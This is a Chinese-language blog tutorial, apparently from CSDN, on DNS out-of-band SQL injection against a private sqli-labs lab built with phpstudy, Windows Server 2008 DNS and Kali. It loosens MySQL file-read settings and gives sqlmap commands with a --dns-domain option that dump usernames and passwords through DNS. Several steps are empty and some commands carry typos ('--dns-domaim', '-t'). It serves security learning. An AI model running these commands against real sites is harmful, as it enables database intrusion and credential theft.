目录

📓前言

📓操作步骤

1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置

2.环境准备

2.1Windows server2008 

2.1.1搭建dns服务器

2.2测试

2.2.1设置靶机的网络的dns为server2008

2.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 

2.2.3server2008中创建转发器

2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况

2.3开始sqlmap使用dnslog外带注入

2.3.1取库 

2.3.2取表

2.3.3取users表的列

2.3.4取表users数据

---

📓前言

• 在最近学习了sql注入的时间盲注后，感觉使用它效率还是不够快，我们这时就可以使用外带注入了，大致就是自己搭建一个dnslog平台，或者使用一个现成的在线平台，比如ceye，然后sqlmap执行的时候加上--dns-domain=xxxx.com 参数就可以，但是使用平台时你可以通过手工注入后在平台看到回显，下面将演示通过一台Windows server 2008(i192.168.78.169)和kali(192.168.78.156)还有一台win11(192.168.78.175)，来实现sqlmap的dns外带注入

📓操作步骤

1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置

show variables like '%secure%';
#当secure_file_priv为空，就可以读取磁盘的目录。
#当secure_file_priv为G:\，就可以读取G盘的文件。
#当secure_file_priv为null，load_file就不能加载文件。
 
phpstudy中在D:\phpstudy_pro\Extensions\MySQL5.7.26下找到my.ini打开添加一条secure_file_priv=""

  

Phpstudy_pro搭建sqllabs靶场_会伏地的向日葵的博客-CSDN博客这篇博客介绍我在使用小皮桌面系统搭建SQLlabs靶场时遇到的可笑问题(纯属个人菜的原因),主要遇到的问题在数据库连接这里报了许多问题，比如数据库安全性问题，数据库用户创建表时的权限问题，归根结底就是我在搭建网点时自己手动创建了一个只有普通权限的数据库，导致后面出现了许许多多的问题，这里我将介绍一下我的搭建过程。...............https://blog.csdn.net/newlife1441/article/details/125875578?

2.环境准备

2.1Windows server2008 

2.1.1搭建dns服务器

            

2.2测试

2.2.1设置靶机的网络的dns为server2008

 

2.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 

2.2.3server2008中创建转发器

 

2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况

 

2.3开始sqlmap使用dnslog外带注入

2.3.1取库 

#注入查库
sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domaim "hehe.top" --dbs

2.3.2取表

#获取表
sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "hehe.top" -D "security" --tables

2.3.3取users表的列

#查列
sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "hehe.top" -D "security" -t "users" --columns

2.3.4取表users数据

#取列值
sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "hehe.top" -D "security" -t "users" -C "username,password" --dump

 

​